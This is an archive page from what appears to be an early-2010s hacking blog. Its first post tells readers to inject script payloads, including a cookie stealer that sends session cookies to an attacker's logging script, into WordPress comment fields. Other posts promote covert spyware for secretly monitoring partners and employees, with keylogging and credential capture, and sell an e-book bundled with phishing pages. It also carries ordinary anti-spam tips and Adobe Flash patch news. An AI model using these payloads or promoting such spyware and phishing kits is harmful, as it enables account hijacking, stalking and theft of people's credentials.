Category Archives: Security

XSS Injection Vulnerability in WordPress 3.2.1

Posted on by
1

Update: It will work only if you are logged in. Sorry for the false alarm. My intention were to alert the bloggers so that they could safeguard their blogs. For more details Click Here

Bad news for just about every WordPress blogger out there. Thousands of WordPress 3.2.1 installations are at risk of being compromised. It has been found that the latest version 3.2.1 of WordPress, an extremely popular suite of tools for powering blogs, is vulnerable to XSS injection attack which allows users to inject malicious JavaScript as a result of failure in sanitizing the comments field. Without discussing much about what this vulnerability could do to your blog I will jump to how it works and the solution.

How does it work?

Inject one of the below codes into the comment field of the target. Or use your brain to make a more powerful injection

Popup “alert” Box
<script>alert(‘hungry-hackers.com’)</script>

Redirect to www.hungry-hackers.com
<script>document.location=”http://hungry-hackers.com”</script>

Cookie Stealer (need a logging system in place)
<script>document.location=***8221;***91;url***93;http://your-domain/your***91;/url***93; stealer.php?cookie=***8221; + document.cookie;document.location=***8221;http://the-site-you-are-stealing-from.com”</script>

Solution:

Upgrade to the latest version when available, In the meantime disable comments or hold comments for moderation as I did ;)


6 Tips to Avoid Facebook Viruses and Spam Messages

Posted on by
19

Facebook, the biggest social network with 500 million users, provides an interface to hit an unsuspecting crowd with malware and viruses. These viruses aren’t very difficult to detect  if you are cautious enough. These Facebook viruses appear on your wall in forms of a bizarre or eye-catching stories and videos and once the user has clicked/liked the link, it is already late. The next step will be getting rid of your Facebook virus which is a time-consuming  process.  Its better to avoid spam messages and trojan viruses in the first place.

How to avoid it?

1. Think before you Act. Viruses on Facebook are sneaky. The hackers and cybercriminals who want your information know that Facebook users will often click on an interesting post without a moment’s thought. If a post sounds a bit over-the-top like a headline out of a tabloid, this is your first warning sign.

2. Try to avoid Links and videos with Catchy words like  “funniest ever,” “most hilarious video on Facebook,” or “you’ve got to see this.” Do some keyword research to see if the post in question comes up in a search engine with information about a current virus or trojan.

3. Check the poster of the Suspicious content. If you receive a message from someone you do not know, this is an obvious red flag. Facebook video viruses also tend to pop up in your news feed or on your wall from friends you haven’t talked to in a while. Unfortunately, it’s likely this friend has already fallen victim to the latest virus on Facebook. After clicking on the story themselves, the message was sent out to all of their friends as well.

4 Avoid messages that have been posted by multiple users as the virus spreads among your friends who were not so cautious. If a link with title such as “Sexiest video ever” shows up all over your feed from all kinds of people (perhaps friends you would not expect to make such a post), this is another warning sign. Similar direct messages are a likely variant of the notorious Facebook Koobface virus which has used this approach in the past.

5. Do not fall for the “typical” money-transfer schemes. Chat messages from friends needing funds will usually sound suspicious. Everything can’t be screened before posting, so money transfer scams and hoax applications still find their way on to Facebook. You should also avoid applications that claim to do a full “Error check” or fix security problems related to your profile.

6. Update your anti-virus software frequently. If you do accidentally click on a post before realizing it is a hoax, do not click on any further links or downloads. If it’s too late and you have already been infected, the Facebook virus removal process may be effortless if you have a good anti-virus program to catch the virus, trojan or other malware early on.

What’s Next?

These were few important tips to safeguard your facebook account but your job isn’t done yet. Once you have detected that the link/post on your facebook wall is Malicious you should Mark it as SPAM so that the facebook support will stop it from spreading further and infecting other users.

If you have ever fallen victim of any such Malicious Scheme, please share your experience with all the users  in form of comments so that others don’t fall victim of it.

SQL Injection Using Havij

Posted on by
12

SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution. Any procedure that constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server will execute all syntactically valid queries that it receives. Even parameterized data can be manipulated by a skilled and determined attacker.

Continue reading

How to Spy on a Remote PC

Posted on by
20

I received a lot of email from the users who wanted to spy on their Girl friends, Boy friends, Spouse, Children or Employee. The software I am going to review today is a solution to all these problems. Using this spy software you will be able to know what your partners are doing. It will allow you to see exactly what your teenager is doing online remotely. It will also allow you to monitor any employee who uses the company computer(s) remotely.

Sniper Spy

SniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature. Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s! This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!

Features

  • Remotely Deployable : It means you don’t need to have access of the system on which you need to install it.
  • Invisibility Stealth Mode : It can work in invisible mode without the knowledge of the victim.
  • Record Login Credentials : It can Records any Password for any Email account or login details of the victim on any website. This can give you access to the victims email or any other web account.

  • Real Time Screen Viewer : You can see all the activities that is taking place on the victim’s PC.
  • Remote Reboot/Shutdown : You can also remotely reboot or shutdown the PC or choose to logoff the current Windows user.
  • Bypass Any Firewall : The best part of this software is that it can completely undetectable by any Firewall available till now.
  • Actual Screenshots : Captures a full-size jpg picture of the active window however often you wish.
  • Websites Visited : Records all website URLs visited in Internet Explorer and Firefox with page title.
  • Keystrokes in Most Languages : Every keystroke typed into ANY window is logged, including passwords typed.
  • PC Location Mapping : Logs the IP at each upload to show you physical locations of the PC on a map.
  • Full Chat Conversations : Records BOTH sides of chats / IMs in Google Talk, Yahoo IM, Windows Live and more.

  • Applications Executed : Records every application executed by the user including full path and username.
  • Application Session Durations : Shows you how long each application was used including start time and stop time.
  • Automatic User File Uploads : Uploads an *actual copy* of every document, picture or desktop file changed.
  • File / Folder Changes : Each time a file or folder changes, the software records the action and the full path.

Download

Click Here to buy this Amazing Software Right Now.

Click Here to go to the Official Website of this Software.

A Beginners Guide To Ethical Hacking

Posted on by
9

Hello Friends,

By now you might be knowing Rafay Baloch the writer of the previous article “Hack a Website Using Remote File Inclusion” and I am sure you would like to have more hacking stuff from him. Well now you don’t have to wait for him to post individual articles because he has compiled an E-book which contains all the interesting hacks. The best part of this e-book is that he has written it in such a manner that even a 5th grade kid can become a Hacker.

Apart from Hacking stuff, this book will also teach you the security aspect and after that you don’t have to worry about being hacked by other hackers.

What is in it for you?

  • You will learn all Ethical Hacking techniques and also you will learn to apply them in real world situation.
  • You will start to think like hackers.
  • You will be able to Secure your computer from Trojans, Worms, Ad-wares etc.
  • Amaze your friends with your newly learned tricks.
  • You will be able to protect your self from future hack attacks.
  • And Much more…

Special Offers for you

Along with this E-book you will get 2 bonus packs for free.
  • 1000 Hacking Tutorial : Hacking Tutorials contains1000 of the best hacking tutorials of 2010 leaked on the internet!
  • Set of Phishers : You will also get a set of 30+ phishers(Fake login page) created by Rafay Baloch.

These offers are limited period only,so what are you waiting for Go and grab a Copy of “A Beginners Guide To Ethical Hacking” and start your Hacking journey.

Download

Click Here to go to the Official Website of this E-Book.

Click Here to Buy this E-book Right Now

Adobe fixes the Flash Bug with a Massive Update

Posted on by
2

Adobe has released a Flash Player update that fixes a flurry of vulnerabilities including a critical zero-day flaw (CVE-2010-1297) that has been actively exploited in attacks since last week. In addition to the numerous security patches, the new Flash player 10.1.53.64 version brings major functionality and performance improvements.

A lot of eyes have been on Adobe since last week, when yet another remote code execution vulnerability affecting Flash Player, as well as Adobe Reader and Acrobat, was announced. Worse yet, the bug was discovered in the wild, meaning it posed an immediate threat to users.

Earlier this week, the company revealed plans to release a patch by June 10, a promise it met yesterday by shipping the first stable version of Flash Player 10.1. This release marks the end of the 10.0.x branch, as well as the end of support for PowerPC G3, 10.1.53.64 being the last version to work on this architecture.

The Security Bulletin accompanying the release names no less than 32 security issues that the new Adobe Flash Player 10.1.53.64 addresses. The vast majority of these vulnerabilities can facilitate arbitrary code execution and affect Adobe AIR as well – for which a new version (2.0.2.12610) was also released.

The Adobe Flash Player update is only available for Windows, Mac and Linux operating systems, with the Solaris version being still in the beta stage of development. A new version for the 9.0.x branch, namely 9.0.277.0, has also been released, to accommodate scenarios where upgrading to 10.1 will break functionality.

Flash Player 10.1 has been a long-awaited release, mainly because it introduces GPU hardware acceleration, a feature that takes the load off CPUs during HD SWF playback, finally allowing for such content to be properly watched on netbooks and other low-performance devices. The video-streaming experience has also been improved, the player automatically adapting the stream quality in real time according to network conditions.

The latest version of Adobe Flash Player 10.1.53.64 can be downloaded from here.

The older version of Adobe Flash Player 9.0.277.0 can be downloaded from here.

The latest version Adobe AIR 2.0.2.12610 for Windows can be downloaded from here.

New Flash Bug Exploited By Hackers : How to avoid it?

Posted on by
8

New Flash Bug

A new attack on a Flash bug has surfaced that would give attackers control of a victim’s computer after crashing it, reports PC World. Adobe put out a Security Advisory about this on June 4. It is categorized as a critical issue and all operating systems with Flash are vulnerable including Windows, Linux, and Apple and it is also found in the recent versions of Reader and Acrobat.

Affected Versions

The affected versions are Adobe Flash Player 10.0.45.2, 9.0.262, and earlier 10.0.x and 9.0.x versions for Windows, Macintosh, Linux and Solaris. Adobe Reader and Acrobat 9.3.2 and earlier 9.x versions for Windows, Macintosh and UNIX. The versions that avoided being affected are Flash Player 10.1 release candidate, link available in the Adobe security advisory, and Acrobat/Reader version 8.x.

Current Situation

The attack isn’t widespread in the wild yet, Adobe has only received two reports of online attacks. Of course the attack is new and may just be starting to ramp up. Adobe will update the advisory when a schedule has been determined for creating a fix.

How to avoid it?

Until the fix is ready, Adobe has advised the Flash users that they should use the 10.1 release candidate to avoid attack where as Acrobat and Reader 9.x users can downgrade to version 8 or deleting, renaming, or removing access to the authplay.dll file that ships with Adobe Reader and Acrobat 9.x mitigates the threat for those products, but users will experience a non-exploitable crash or error message when opening a PDF file that contains SWF content. The authplay.dll that ships with Adobe Reader and Acrobat 9.x for Windows is typically located at C:\Program Files\Adobe\Reader 9.0\Reader\authplay.dll for Adobe Reader or C:\Program Files\Adobe\Acrobat 9.0\Acrobat\authplay.dll for Acrobat.